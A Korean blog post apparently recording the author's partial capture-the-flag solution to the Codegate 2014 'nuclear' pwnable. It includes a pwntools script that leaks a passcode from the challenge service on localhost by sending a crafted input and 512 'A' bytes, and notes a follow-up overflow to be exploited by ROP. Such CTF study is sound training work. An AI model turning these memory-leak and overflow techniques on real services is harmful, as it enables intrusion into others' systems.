고졸백수해킹일기

codegate2014 nuclear 본문

Pwnable

codegate2014 nuclear

ExploitSori 2018. 3. 9. 23:48

바이너리를 보면 무슨 패스코드 파일을 읽어와서 input값이랑 비교하는데

target메뉴 이후 입력받는 과정에서 릭을 하면 passcode를 읽어올 수 있다.

아래는 릭 코드

#####leak######

from pwn import *

import time

s = remote('localhost',1129)


print s.recv(1024)

s.sendline('target')

time.sleep(1)

print s.recv(1024)

s.sendline('1094795585.000000/1094795585.000000')

time.sleep(1)

print s.recv()

s.sendline('A'*512)

time.sleep(1)

print s.recv(4096)


이후 실행되는 start_routine이라는 곳에서 오버플로가 발생한다.
launch에서 rop해주면 된다
자세한 풀이는 이따가 올림


'Pwnable' 카테고리의 다른 글

ARM exploit  (0) 2020.09.12
pdb symbol 수동으로 다운  (0) 2020.08.14
defcon2017 smashme (exploit only)  (0) 2018.03.28
pwntools shellcraft 사용법  (0) 2018.03.15
codegate2018 BaskinRobins31  (0) 2018.03.06